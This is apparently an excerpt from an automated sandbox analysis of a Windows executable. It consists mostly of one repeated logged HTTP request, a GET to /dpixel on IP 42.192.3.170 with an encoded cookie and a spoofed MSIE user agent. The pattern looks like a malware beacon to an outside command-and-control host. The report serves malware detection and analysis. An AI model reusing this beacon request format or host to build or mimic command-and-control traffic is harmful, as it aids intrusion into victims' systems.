          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: unknown TCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0066E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle, 0_2_0066E68C
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
